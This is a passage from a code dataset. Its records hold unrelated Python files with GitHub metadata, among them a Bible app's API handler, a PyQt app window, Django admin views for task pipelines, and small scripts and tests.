chapter.replace(\"%3E\", \">\")\n data = Book(module).getContentByChapter(chapter)\n self.jsonData['data'] = data if data else (\"[Not found]\",)\n\n # /commentary/ABC/43/1\n def processCommentaryCommand(self, cmd):\n config.commentariesFolder = os.path.join(config.marvelData, \"commentaries\")\n if len(cmd) == 1:\n self.jsonData['data'] = [commentary for commentary in Commentary().getCommentaryList()]\n return\n elif len(cmd) < 4:\n self.sendError(\"Invalid Commentary command\")\n return\n commentary = urllib.parse.unquote(cmd[1])\n data = Commentary(commentary).getRawContent(cmd[2], cmd[3])\n self.jsonData['data'] = data if data else (\"[Not found]\",)\n\n # /lexicon\n # /lexicon/TBESG/G5\n def processLexiconCommand(self, cmd):\n CatalogUtil.reloadLocalCatalog()\n if len(cmd) == 1:\n self.jsonData['data'] = [lexicon for lexicon in LexiconData().lexiconList]\n return\n elif len(cmd) < 3:\n self.sendError(\"Invalid Lexicon command\")\n return\n data = Lexicon(cmd[1]).getRawContent(cmd[2])\n self.jsonData['data'] = data if data else (\"[Not found]\",)\n\n # /lexiconreverse\n # /lexiconreverse/TRLIT/love\n def processLexiconReverseCommand(self, cmd):\n CatalogUtil.reloadLocalCatalog()\n if len(cmd) == 1:\n self.jsonData['data'] = [lexicon for lexicon in LexiconData().lexiconList]\n return\n elif len(cmd) < 3:\n self.sendError(\"Invalid Lexicon command\")\n return\n data = Lexicon(cmd[1]).getRawReverseContent(cmd[2])\n self.jsonData['data'] = data if data else (\"[Not found]\",)\n\n # /devotional\n # /devotional/Chambers+-+My+Utmost+For+His+Highest/12/25\n def processDevotionalCommand(self, cmd):\n if len(cmd) == 1:\n self.jsonData['data'] = [Path(devotional).stem for devotional in sorted(glob.glob(os.path.join(config.marvelData, \"devotionals\", \"*.devotional\")))]\n return\n elif len(cmd) < 4:\n self.sendError(\"Invalid Lexicon command\")\n return\n devotional = cmd[1].replace(\"+\", \" \")\n self.jsonData['data'] = DevotionalSqlite(devotional).getEntry(cmd[2], cmd[3])\n\n # /dictionary\n # /dictionary/search/FAU/temple\n # /dictionary/content/FAU3650\n def processDictionaryCommand(self, cmd):\n if len(cmd) == 1:\n self.jsonData['data'] = [dictionary[0] for dictionary in IndexesSqlite().dictionaryList]\n return\n elif len(cmd) < 3:\n self.sendError(\"Invalid Dictionary command\")\n return\n if cmd[1].lower() == \"search\":\n self.jsonData['data'] = {'exact': SearchSqlite().getContent(cmd[2], cmd[3]),\n 'similar': SearchSqlite().getSimilarContent(cmd[2], cmd[3])}\n elif cmd[1].lower() == \"content\":\n self.jsonData['data'] = DictionaryData().getRawContent(cmd[2])\n\n # /crossreference/1/1/1\n # /crossreference/1/1/1/KJV\n def processCrossReferenceCommand(self, cmd):\n if len(cmd) < 4:\n self.sendError(\"Invalid Cross Reference command\")\n return\n data = CrossReferenceSqlite().getCrossReferenceList((cmd[1], cmd[2], cmd[3]))\n if len(cmd) == 4:\n self.jsonData['data'] = data\n else:\n versesData = []\n verses = BibleVerseParser(config.parserStandarisation).extractAllReferencesFast(data)\n text = cmd[4]\n for (b, c, v, *_) in verses:\n record = Bible(text).readTextVerse(b, c, v)\n versesData.append(record)\n self.jsonData['data'] = versesData\n\n # /compare/1/1/1?text=KJV&text=TRLIT&text=WEB\n def processCompareCommand(self, cmd, query):\n if len(cmd) < 4:\n self.sendError(\"Invalid Compare command\")\n return\n if query:\n texts = query[\"text\"]\n else:\n texts = ['KJV']\n self.jsonData['data'] = BiblesSqlite().compareVerseRaw((cmd[1], cmd[2], cmd[3]), texts)\n\n # /search?searchText=faith\n def processSearchCommand(self, cmd, query):\n try:\n searchText = query[\"searchText\"][0]\n type = query[\"type\"][0] if \"type\" in query.keys() else \"bible\"\n if type == \"bible\":\n text = query[\"text\"][0] if \"text\" in query.keys() else \"KJV\"\n query = \"SELECT Book, Chapter, Verse, Scripture FROM Verses \"\n query += \"WHERE \"\n query += \"(Scripture LIKE ?) \"\n query += \"ORDER BY Book, Chapter, Verse \"\n query += \"LIMIT 5000 \"\n if '\"' in searchText:\n searchText = searchText.replace('\"', '')\n else:\n searchText = searchText.replace(\" \", \"%\").replace(\"+\", \"%\")\n t = (\"%{0}%\".format(searchText),)\n verses = Bible(text).getSearchVerses(query, t)\n\n self.jsonData['data'] = verses\n except Exception as ex:\n self.sendError(\"Invalid search command - \" + ex)\n\n # /morphology/1/34684\n def processMorphologyCommand(self, cmd):\n if len(cmd) < 3:\n self.sendError(\"Invalid Morphology command\")\n return\n morphologySqlite = MorphologySqlite()\n wordID, clauseID, b, c, v, textWord, lexicalEntry, morphologyCode, morphology, lexeme, transliteration, pronuciation, interlinear, translation, gloss = morphologySqlite.searchWordRaw(cmd[1], cmd[2])\n lexicalEntry = lexicalEntry.split(\",\")[0]\n translations = morphologySqlite.distinctMorphology(lexicalEntry)\n self.jsonData['data'] = (textWord, lexeme, lexicalEntry, morphologyCode, morphology, transliteration, pronuciation, interlinear, translation, gloss, translations)\n\n # /searchtool/mETCBC/adjv.f.pl.a\n def processSearchToolCommand(self, cmd):\n try:\n data = SearchSqlite().getContent(cmd[1], cmd[2])\n self.jsonData['data'] = data\n except Exception as ex:\n self.sendError(\"Invalid search command - \" + ex)\n\n # /discourse/1/1/1\n def processDiscourseCommand(self, cmd):\n try:\n verseData = VerseData(\"discourse\")\n data = verseData.getContent((int(cmd[1]), int(cmd[2]), int(cmd[3])))\n self.jsonData['data'] = data\n except Exception as ex:\n self.sendError(\"Invalid discourse command - \" + ex)\n","repo_name":"eliranwong/UniqueBible","sub_path":"util/RemoteApiHandler.py","file_name":"RemoteApiHandler.py","file_ext":"py","file_size_in_byte":15952,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"53"} +{"seq_id":"22547398402","text":"#!/usr/bin/env python\n\nimport datetime\nimport time\nimport sys\nimport struct\nimport common_py2 as com2\n\nADDRESS = '/tmp/usock.sock' \nBUFSIZE = 4096\n\nserver = com2.UnixSocket(ADDRESS, BUFSIZE)\n\ndef clientMain():\n data = 0\n msg = 0\n while True:\n time.sleep(0.1)\n msg = struct.pack('B',data)\n msg += struct.pack('B',data+1)\n data += 1\n if data >254:\n data = 0\n server.client_send(msg)\n now = datetime.datetime.now()\n print('[client]Send:message={0} [{1}]'.format(msg.encode('hex'), now))\n\nif __name__ == '__main__':\n try:\n clientMain()\n except KeyboardInterrupt:\n print('[client]closed.')\n sys.exit(1)\n\n","repo_name":"zuky88/Connect_Python3_and_Python2","sub_path":"client_py2.py","file_name":"client_py2.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16463126813","text":"from base.testing import KlaytnBaseTesting\n\n\nclass TestGetRewardsAccumulated(KlaytnBaseTesting):\n\n def setUp(self) -> None:\n super().setUp()\n self.firstBlock = 123400489\n self.lastBlock = 123416489\n\n def test_post(self):\n self.response = self.w3.governance.governance_get_rewards_accumulated(\n self.firstBlock, self.lastBlock\n )\n self.assertIsInstance(self.response['totalMinted'], int)\n","repo_name":"klaytn/web3klaytn","sub_path":"web3rpc/sdk/client/python/openapi-test/test/governance/test_get_rewards_accumulated.py","file_name":"test_get_rewards_accumulated.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"44119987858","text":"\"\"\"\n Главное окно АИС \"ГСП Ремонт\"\n\"\"\"\n\nimport sys\nimport os\n\nfrom PyQt6 import uic\nfrom PyQt6 import QtWidgets, QtGui\n\nfrom src.general_modules.resoursedir import DirUi, DirFont\nfrom src.general_modules.resourseuser import AdminUser\nfrom src.general_modules.connectDB import ConnectDb\n\nfrom src.managementDB_modules.manager_gen_cmd import ManagerDBCmd\n\n\nclass AppMain(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n self.data_con = None\n self.con_db = None\n self.table_manager_cmd = None\n\n # Путь к файлу (элементу) интерфейса\n file_path = DirUi.MAIN_WINDOW.value\n\n # Загрузка файла (элемента) интерфейса\n uic.loadUi(os.path.join(*file_path), self)\n\n # Подзаголовочное меню \"Подключение\"\n self.actBDcmda.triggered.connect(self.act_connectdb_cmd) # Меню \"Подключить БД КИПиА\"\n self.actExit.triggered.connect(self.act_exit) # Меню \"Выход\"\n\n # Подзаголовочное меню \"Редактирование БД\"\n self.actGenCmd.triggered.connect(self.act_managerdb_cmd) # Меню \"Общие сведения о КИП\"\n\n # Обработчики меню \"Подключение\"\n # Меню \"Подключить БД КИПиА\"\n def act_connectdb_cmd(self):\n self.data_con = AdminUser.MAIN_AKK.value\n self.con_db = ConnectDb('gspcoast', *self.data_con)\n self.con_db.connect_db()\n\n # Меню \"Выход\"\n def act_exit(self):\n self.con_db.close_db()\n app.quit()\n\n # Обработчики меню \"Редактирование БД\"\n # Меню \"Общие сведения о КИП\"\n def act_managerdb_cmd(self):\n self.table_manager_cmd = ManagerDBCmd()\n\n\n\n\n# Запуск Главного окна программы\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n\n # Установка стиля отображения интерфейса\n app.setStyle('Fusion')\n\n # Установка основного шрифта приложения\n font_path = DirFont.MAIN_FONT.value\n QtGui.QFontDatabase.addApplicationFont(os.path.join(*font_path))\n\n window = AppMain()\n window.showMaximized()\n window.show()\n sys.exit(app.exec())\n","repo_name":"peterkurzzz/gspcoast","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26524541837","text":"import ujson as json\nfrom bamboo_engine.eri import ContextValue, ContextValueType\n\nfrom django.views.decorators.http import require_GET, require_POST\nfrom django.http.response import JsonResponse\n\nfrom gcloud.core.models import EngineConfig\nfrom gcloud.utils.handlers import handle_plain_log\nfrom pipeline.engine.models import PipelineModel, PipelineProcess, Status, ScheduleService\nfrom pipeline.core.pipeline import PipelineShell\nfrom pipeline.engine.utils import calculate_elapsed_time\nfrom pipeline.core.data.var import Variable\nfrom pipeline.eri.runtime import BambooDjangoRuntime\nfrom pipeline.service import task_service\nfrom pipeline.core.flow.activity import Activity\nfrom pipeline.core.flow.gateway import Gateway\nfrom pipeline.core.flow.event import StartEvent, EndEvent\nfrom gcloud.taskflow3.models import TaskFlowInstance\nfrom gcloud.taskflow3.domains.context import TaskContext\nfrom gcloud.iam_auth.intercept import iam_intercept\nfrom gcloud.iam_auth.view_interceptors.admin import AdminEditViewInterceptor, AdminViewViewInterceptor\n\nSERIALIZE_DATE_FORMAT = \"%Y-%m-%d %H:%M:%S %Z\"\n\n\ndef format_variables_value(var_value):\n if isinstance(var_value, TaskContext):\n return var_value.__dict__\n\n return var_value\n\n\ndef format_variables(variables):\n _vars = {}\n for key, var in variables.items():\n if isinstance(var, Variable):\n _vars[key] = {\"name\": var.name, \"value\": format_variables_value(var.value)}\n elif isinstance(var, TaskContext):\n _vars[key] = {\"name\": key, \"value\": var.__dict__}\n else:\n _vars[key] = var\n\n return _vars\n\n\ndef serialize_pipeline_context(context):\n return {\n \"variables\": format_variables(context.variables),\n \"act_outputs\": context.act_outputs,\n \"_output_key\": context._output_key,\n \"_change_keys\": getattr(context, \"_change_keys\"),\n \"_raw_variables\": format_variables(getattr(context, \"_raw_variables\", {})),\n }\n\n\ndef serialize_process_data(process):\n def serialize(process):\n data = {\n \"id\": process.id,\n \"root_pipeline_id\": process.root_pipeline_id,\n \"current_node_id\": process.current_node_id,\n \"destination_id\": process.destination_id,\n \"parent_id\": process.parent_id,\n \"ack_num\": process.ack_num,\n \"need_ack\": process.need_ack,\n \"is_alive\": process.is_alive,\n \"is_sleep\": process.is_sleep,\n \"is_frozen\": process.is_frozen,\n \"children\": process.children,\n \"child_process\": {},\n \"subprocess_stack\": process.subprocess_stack,\n \"context\": None,\n \"subprocess_context\": {},\n }\n\n if process.snapshot:\n data[\"in_subprocess\"] = process.in_subprocess\n\n if process.root_pipeline:\n if isinstance(process.root_pipeline, PipelineShell):\n data[\"context\"] = \"can not get context from PipelineShell\"\n else:\n data[\"context\"] = serialize_pipeline_context(process.root_pipeline.context)\n\n if process.pipeline_stack:\n for pipeline in process.pipeline_stack[:-1]:\n data[\"subprocess_context\"][pipeline.id] = serialize_pipeline_context(pipeline.context)\n\n if process.children:\n for child in PipelineProcess.objects.filter(parent_id=process.id):\n data[\"child_process\"][child.id] = serialize(child)\n\n return data\n\n return serialize(process)\n\n\n@require_GET\n@iam_intercept(AdminViewViewInterceptor())\ndef get_taskflow_v1_detail(request):\n task_id = request.GET.get(\"task_id\")\n\n try:\n taskflow = TaskFlowInstance.objects.get(id=task_id)\n except TaskFlowInstance.DoesNotExist:\n return {\"result\": False, \"message\": f\"task {task_id} not exist\"}\n\n if taskflow.engine_ver != EngineConfig.ENGINE_VER_V1:\n return JsonResponse(\n {\"result\": False, \"message\": f\"only support task with engine version {EngineConfig.ENGINE_VER_V1}\"}\n )\n\n process_data = \"pipeline not run\"\n if taskflow.pipeline_instance.is_started:\n engine_model = PipelineModel.objects.get(id=taskflow.pipeline_instance.instance_id)\n process_data = serialize_process_data(engine_model.process)\n\n return JsonResponse({\"result\": True, \"data\": process_data})\n\n\ndef hydrate_inputs(inputs):\n hydrated = {}\n for k, v in inputs.items():\n if isinstance(v, Variable):\n hydrated[k] = {\"repr\": f\"{v}\", \"name\": v.name, \"value\": v.value}\n else:\n hydrated[k] = v\n\n return hydrated\n\n\n@require_GET\n@iam_intercept(AdminViewViewInterceptor())\ndef get_taskflow_v1_node_detail(request):\n task_id = request.GET.get(\"task_id\")\n node_id = request.GET.get(\"node_id\")\n subprocess_stack = json.loads(request.GET.get(\"subprocess_stack\", \"[]\"))\n\n data = {\n \"execution_info\": {},\n \"inputs\": \"pipeline has been destoryed\",\n \"outputs\": \"pipeline has been destoryed\",\n \"history\": {},\n \"log\": \"\",\n \"ex_data\": \"\",\n }\n\n taskflow = TaskFlowInstance.objects.get(id=task_id)\n\n if taskflow.engine_ver != EngineConfig.ENGINE_VER_V1:\n return JsonResponse(\n {\"result\": False, \"message\": f\"only support task with engine version {EngineConfig.ENGINE_VER_V1}\"}\n )\n\n if not taskflow.pipeline_instance.is_started:\n return JsonResponse({\"result\": False, \"message\": f\"task[{task_id}] is not start\"})\n\n if not taskflow.has_node(node_id):\n return JsonResponse({\"result\": False, \"message\": f\"task[{task_id}] does not have node[{node_id}]\"})\n\n status = Status.objects.get(id=node_id)\n\n # collect execution info\n data[\"execution_info\"] = {\n \"name\": status.name,\n \"start_time\": status.started_time.strftime(SERIALIZE_DATE_FORMAT) if status.started_time else None,\n \"archive_time\": status.archived_time.strftime(SERIALIZE_DATE_FORMAT) if status.archived_time else None,\n \"elapsed_time\": calculate_elapsed_time(status.started_time, status.archived_time),\n \"skip\": status.skip,\n \"error_ignorable\": status.error_ignorable,\n \"retry_times\": status.retry,\n \"id\": status.id,\n \"state\": status.state,\n \"loop\": status.loop,\n \"create_time\": status.created_time,\n \"version\": status.version,\n \"schedule_id\": None,\n \"is_scheduling\": False,\n \"schedule_times\": 0,\n \"wait_callback\": False,\n \"is_finished\": False,\n \"schedule_version\": None,\n \"callback_data\": None,\n }\n\n try:\n schedule = ScheduleService.objects.schedule_for(status.id, status.version)\n except ScheduleService.DoesNotExist:\n pass\n else:\n data[\"execution_info\"].update(\n {\n \"schedule_id\": schedule.id,\n \"is_scheduling\": schedule.is_scheduling,\n \"schedule_times\": schedule.schedule_times,\n \"wait_callback\": schedule.wait_callback,\n \"is_finished\": schedule.is_finished,\n \"schedule_version\": schedule.version,\n \"callback_data\": schedule.callback_data,\n }\n )\n\n # collect inputs and outputs\n\n process = PipelineModel.objects.get(id=taskflow.pipeline_instance.instance_id).process\n\n # only process activity's inputs and outputs\n if process.root_pipeline:\n\n target_pipeline = process.root_pipeline\n for sub_id in subprocess_stack:\n subprocess_act = [x for x in target_pipeline.spec.activities if x.id == sub_id][0]\n target_pipeline = subprocess_act.pipeline\n\n node = target_pipeline.spec.objects[node_id]\n\n if isinstance(node, Activity):\n data[\"inputs\"] = hydrate_inputs(node.data.inputs)\n data[\"outputs\"] = node.data.outputs\n\n elif isinstance(node, Gateway):\n data[\"inputs\"] = data[\"outputs\"] = \"gateway object does not have data\"\n\n elif isinstance(node, StartEvent):\n data[\"inputs\"] = data[\"outputs\"] = \"start event object does not have data\"\n\n elif isinstance(node, EndEvent):\n data[\"inputs\"] = node.data.inputs\n data[\"outputs\"] = node.data.outputs\n\n elif taskflow.pipeline_instance.is_finished or taskflow.pipeline_instance.is_revoked:\n data[\"inputs\"] = data[\"outputs\"] = \"pipeline had finished or had been revoked\"\n\n # collect history\n data[\"history\"] = task_service.get_activity_histories(node_id)\n\n # collect log\n data[\"log\"] = handle_plain_log(task_service.get_plain_log_for_node(node_id))\n\n # set ex_data\n data[\"ex_data\"] = task_service.get_outputs(node_id)[\"ex_data\"]\n\n return JsonResponse({\"result\": True, \"data\": data})\n\n\n@require_GET\n@iam_intercept(AdminViewViewInterceptor())\ndef get_node_v1_history_log(request):\n node_id = request.GET.get(\"node_id\")\n history_id = request.GET.get(\"history_id\")\n\n data = {\"log\": handle_plain_log(task_service.get_plain_log_for_node(node_id, history_id))}\n\n return JsonResponse({\"result\": True, \"data\": data})\n\n\n@require_POST\n@iam_intercept(AdminEditViewInterceptor())\ndef upsert_taskflow_v2_context(request):\n data = json.loads(request.body)\n context = data.get(\"context\")\n task_id = data.get(\"task_id\")\n\n taskflow = TaskFlowInstance.objects.get(id=task_id)\n runtime = BambooDjangoRuntime()\n context_values = {\n key: ContextValue(key=key, type=ContextValueType.PLAIN, value=value) for key, value in context.items()\n }\n runtime.upsert_plain_context_values(pipeline_id=taskflow.pipeline_instance.instance_id, update=context_values)\n return JsonResponse({\"result\": True, \"message\": \"upsert taskflow_context done\"})\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"gcloud/contrib/admin/views/taskflow.py","file_name":"taskflow.py","file_ext":"py","file_size_in_byte":9725,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"3276703832","text":"def stack_operation(stack_commands):\n ret = []\n for comm in stack_commands:\n if comm[0] == 'push':\n ret.append(comm[1])\n elif comm[0] == 'pop':\n ret.pop()\n elif comm[0] == 'show_max':\n print(max(ret))\n return ret\n \"\"\"\n Funkcja przyjmuję listę jedno i dwu elementowych krotek - operacji na stosie.\n Pierwszy element krotki to operacja, drugi wartość (opcjonalnie). Operacje:\n push - dodaj element do stosu\n pop - usuń element ze stosu\n show_max - wypisz maksymalny element w stosie\n Uzupełnij funkcje tak, by dla podanej zwróciła ciąg maksymalnych elementów (zgodny z liczbą operacj 3).\n\n :param stack_commands: List of tuples of stack commands.\n :type stack_commands: list\n :return: List of outputs from commands.\n :rtype: list\n \"\"\"\n\n\n\nif __name__ == \"__main__\":\n commands = [\n ('push', 97),\n ('pop',),\n ('push', 20), \n ('pop',), \n ('push', 26), \n ('push', 20), \n ('pop',), \n ('show_max',), \n ('push', 91), \n ('show_max',)\n ]\n assert stack_operation(commands) == [26, 91]\n","repo_name":"przempol/python_labs","sub_path":"lab_2/tasks/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9249999477","text":"with open(\"/home/zxh/train_list.txt\", \"r+\") as f:\n lines = f.readlines()\nlabel_image = {}\nfor line in lines:\n name, label = line.split(\" \")\n label = label[:-1]\n name = name.split('/')[1].split('.')[0]\n # print(name,\" \",label)\n if label in label_image.keys():\n label_image[label].append(name)\n else:\n label_image[label] = [name]\n\n# print(label_image.keys())\nprint(len(label_image.keys()))\n\nnumbers = dict()\n\nfor k, v in label_image.items():\n # print(f\"{k} {len(v)}\")\n if len(v) in numbers.keys():\n numbers[len(v)].append(k)\n else:\n numbers[len(v)] = [k]\n\nsorted_keys = sorted(numbers)\n\nless_4 = []\nless_20_more_4 = []\nfor key in sorted_keys:\n if key <= 20 and key >= 4:\n less_20_more_4 += numbers[key]\n elif key < 4:\n less_4 += numbers[key]\nprint(len(set(less_20_more_4)))\nprint(len(set(less_4)))\nwith open(\"less_4.txt\", 'w') as f:\n f.write(str(less_4))\nwith open(\"less_20_more_4.txt\", 'w') as f:\n f.write(str(less_20_more_4))\n\n","repo_name":"ZHUXUHAN/reid-baseline","sub_path":"pre_data/prepare_list.py","file_name":"prepare_list.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28790008775","text":"import citationSearch\nimport commonSearch\nimport sju_response\nimport concurrent.futures\nimport datetime\nimport sys\nimport os\nimport traceback\n\ndef inputValidation(dsres, serviceName):\n dsres.print(command='log', msg='인풋 값을 검증합니다.')\n now = datetime.datetime.now()\n returnDict = {}\n \n # 단일 상세 검색 및 저자명 검색\n if serviceName == 'singleCitationSearch' or serviceName == 'citationSearchByAuthor':\n query = input().strip()\n startYear = input().strip()\n endYear = input().strip()\n pAuthors = input().strip()\n organizaion = input().strip\n \n if not len(query) > 2: raise Exception('쿼리의 길이가 너무 짧습니다.')\n if not 1900 <= int(startYear) <= now.year: raise Exception('시작년도가 올바르지 않습니다.')\n if not 1900 <= int(endYear) <= now.year: raise Exception('끝 년도가 올바르지 않습니다.')\n if not int(startYear) <= int(endYear): raise Exception('검색 기간이 올바르지 않습니다.')\n # if not pAuthors: raise Exception('---')\n returnDict['query'] = query \n returnDict['startYear'] = startYear \n returnDict['endYear'] = endYear \n returnDict['pAuthors'] = pAuthors\n returnDict['organization'] = organization\n # 다중 상세 검색\n elif serviceName == 'multiCitationSearch':\n startYear = input().strip()\n endYear = input().strip()\n gubun = input().strip()\n path = input().strip()\n \n if not 1900 <= int(startYear) <= now.year: raise Exception('시작년도가 올바르지 않습니다.')\n if not 1900 <= int(endYear) <= now.year: raise Exception('끝 년도가 올바르지 않습니다.')\n if not int(startYear) <= int(endYear): raise Exception('검색 기간이 올바르지 않습니다.')\n if not (gubun == 'TI' or gubun == 'DO'): raise Exception('구분이 올바르지 않습니다.')\n if not (\n path.endswith('.csv') \n or path.endswith('.xls')\n or path.endswith('.xlsx')): raise Exception('파일 확장자가 올바르지 않습니다.')\n returnDict['startYear'] = startYear \n returnDict['endYear'] = endYear \n returnDict['gubun'] = gubun \n returnDict['path'] = path \n\n # 다중 일반 검색\n elif serviceName == 'multiCommonSearch':\n startYear = input().strip()\n endYear = input().strip()\n gubun = input().strip()\n inputFilePath = input().strip()\n defaultQueryPackSize = input().strip()\n\n if not 1900 <= int(startYear) <= now.year: raise Exception('시작년도가 올바르지 않습니다.')\n if not 1900 <= int(endYear) <= now.year: raise Exception('끝 년도가 올바르지 않습니다.')\n if not int(startYear) <= int(endYear): raise Exception('검색 기간이 올바르지 않습니다.')\n if not (gubun == 'TI' or gubun == 'DO'): raise Exception('구분이 올바르지 않습니다.')\n path = inputFilePath\n if not (\n path.endswith('.csv') \n or path.endswith('.xls')\n or path.endswith('.xlsx')): raise Exception('파일 확장자가 올바르지 않습니다.')\n returnDict['startYear'] = startYear \n returnDict['endYear'] = endYear \n returnDict['gubun'] = gubun \n returnDict['inputFilePath'] = path \n returnDict['defaultQueryPackSize'] = defaultQueryPackSize \n else:\n raise Exception('인풋 값 검증 중 알 수 없는 오류')\n return returnDict\n\nif __name__ == \"__main__\":\n sLock = citationSearch.SearchLock()\n dsres = sju_response.SJUresponse('dispatcher')\n dsres.print(command='res', target='loading', res=True)\n dsres.print(command='log', msg='dispatcher를 준비합니다.')\n singleCitationSearchObj = None\n multiCitationSearchObj = None\n multiCommonSearchObj = None\n oneByOneSearchObj = None\n\n # 서비스 초기화\n try:\n serviceList = [\n { 'name': 'SingleCitationSearch', 'init': citationSearch.SingleSearch }, \n { 'name': 'MultiCitationSearch', 'init': citationSearch.MultiSearch },\n { 'name': 'oneByOneSearch', 'init': citationSearch.OneByOneSearch },\n { 'name': 'MultiCommonSearch', 'init': commonSearch.MultiSearch },\n ]\n \n dsres.print(command='log', msg='기반 서비스를 초기화합니다. 이 작업은 2~3분이 소요됩니다.')\n dsres.print(command='log', msg='각 서비스의 브라우저 인증, 검색 폼 초기화를 수행합니다.')\n dsres.print(command='log', msg='초기화 진행 중 검색 서비스는 이용할 수 없습니다.')\n with concurrent.futures.ThreadPoolExecutor(max_workers=len(serviceList)) as executor:\n future_service = {\n executor.submit(service['init'], sju_response.SJUresponse(service['name']), sLock): service['name'] for service in serviceList\n }\n for future in concurrent.futures.as_completed(future_service):\n name_done = future_service[future]\n try:\n tempObj = future.result()\n if name_done == 'SingleCitationSearch': \n singleCitationSearchObj = tempObj\n dsres.print(command='log', msg='SID : %s'%(singleCitationSearchObj.SID))\n dsres.print(command='log', msg='jsessionid : %s'%(singleCitationSearchObj.jsessionid))\n dsres.print(command='log', msg='단일 상세 검색 서비스 초기화가 완료되었습니다.')\n elif name_done == 'MultiCitationSearch':\n multiCitationSearchObj = tempObj\n dsres.print(command='log', msg='다중 상세 검색 서비스 초기화가 완료되었습니다.')\n elif name_done == 'MultiCommonSearch':\n multiCommonSearchObj = tempObj\n dsres.print(command='log', msg='다중 일반 검색 서비스 초기화가 완료되었습니다.')\n elif name_done == 'oneByOneSearch':\n oneByOneSearchObj = tempObj\n dsres.print(command='log', msg='저자명 기준 검색 서비스 초기화가 완료되었습니다.')\n \n except Exception as e:\n dsres.print(command='sysErr', msg='초기화 중 오류가 발생했습니다.')\n dsres.print(command='errObj', msg=e)\n else:\n dsres.print(command='log', msg='%s 초기화 완료'%name_done)\n \n except Exception as e:\n dsres.print(command='sysErr', msg='연결에 실패했습니다. 인터넷 연결이나 접속한 장소가 유효한 지 확인해주세요. 혹은 일시적 현상일 수 있으니 잠시 후 다시 접속해주세요.')\n dsres.print(command='log', msg='dispatcher를 종료합니다.')\n dsres.print(command='errObj', msg=e)\n exit(2000)\n\n dsres.print(command='log', msg='dispatcher가 준비되었습니다.')\n while(True):\n # 반복 전역 예외 처리\n dsres.print(command='res', target='loading', res=False)\n try:\n \n # 검색 서비스 종류\n serviceName = input().strip()\n dsres.print(command='res', target='loading', res=True)\n \n inputs = ''\n try:\n inputs = inputValidation(dsres, serviceName)\n except Exception as e:\n dsres.print(command='sysErr', msg='인풋 값이 유효하지 않습니다.')\n dsres.print(command='errObj', msg=e)\n continue\n\n # 단일 상세 검색\n if serviceName == 'singleCitationSearch':\n query = inputs['query']\n startYear = inputs['startYear']\n endYear = inputs['endYear']\n pAuthors = inputs['pAuthors']\n organization = inputs['organization']\n\n try:\n singleCitationSearchObj.generalSearch(\n query=(query, pAuthors, organization), \n startYear=startYear, \n endYear=endYear, \n gubun='TI',\n resName='res',\n )\n \n except Exception as e:\n dsres.print(command='sysErr', msg='심각한 오류')\n dsres.print(command='errObj', msg=e)\n else:\n dsres.print(command='log', msg='단일 검색을 마쳤습니다.')\n\n # 다중 상세 검색\n elif serviceName == 'multiCitationSearch':\n startYear = inputs['startYear']\n endYear = inputs['endYear']\n gubun = inputs['gubun']\n path = inputs['path']\n\n try:\n multiCitationSearchObj.generalSearch(\n startYear=startYear,\n endYear=endYear,\n gubun=gubun,\n path=path\n )\n except Exception as e:\n dsres.print(command='sysErr', msg='상세 엑셀 검색 중 오류가 발생했습니다.')\n else:\n dsres.print(command='log', msg='상세 엑셀 검색이 완료되었습니다.')\n\n # 다중 일반 검색\n elif serviceName == 'multiCommonSearch':\n startYear = inputs['startYear']\n endYear = inputs['endYear']\n gubun = inputs['gubun']\n inputFilePath = inputs['inputFilePath']\n defaultQueryPackSize = inputs['defaultQueryPackSize']\n\n try:\n multiCommonSearchObj.generalSearch(\n startYear = startYear,\n endYear = endYear,\n gubun = gubun,\n inputFilePath = inputFilePath,\n defaultQueryPackSize = 0\n )\n except Exception as e:\n dsres.print(command='sysErr', msg='일반 엑셀 검색 중 오류가 발생했습니다.')\n else:\n dsres.print(command='log', msg='일반 엑셀 검색이 완료되었습니다.')\n\n # 저자명 기준 검색\n if serviceName == 'citationSearchByAuthor':\n query = inputs['query']\n startYear = inputs['startYear']\n endYear = inputs['endYear']\n pAuthors = inputs['pAuthors']\n organization = inputs['organization']\n try:\n oneByOneSearchObj.generalSearch(\n query=(query, pAuthors, organization),\n startYear=startYear,\n endYear=endYear, \n gubun='AU',\n resName='ares',\n )\n \n except Exception as e:\n dsres.print(command='sysErr', msg='심각한 오류')\n dsres.print(command='errObj', msg=e)\n else:\n dsres.print(command='log', msg='저자명 검색을 마쳤습니다.')\n # 알 수 없는 서비스 네임\n else:\n print(serviceName)\n # dsres.print(command='sysErr', msg='알 수 없는 서비스 접근')\n except EOFError as eof:\n dsres.print(command='sysErr', msg='dispatcher와의 연결이 해제되었습니다. 프로그램을 다시 시작해주세요.')\n sys.exit(1)\n except Exception as e:\n dsres.print(command='sysErr', msg='알 수 없는 오류가 발생했습니다.')\n traceback.print_tb(e.__traceback__) \n continue","repo_name":"jcpark3797/sejong-wos","sub_path":"pyscripts/OLDPY/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":12010,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9407915923","text":"from rest_flex_fields import FlexFieldsModelSerializer\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import MethodNotAllowed, NotFound\nfrom store.models import Product\nfrom store.serializers import (\n ProductPreviewSerializer,\n VendorPreviewSerializer,\n)\n\nfrom .models import Order, OrderDetail\n\navailable = (\"OFFERED\", \"DENIED\", \"PENDING\")\nsold = (\"PROCESSING\", \"ACCEPTED\", 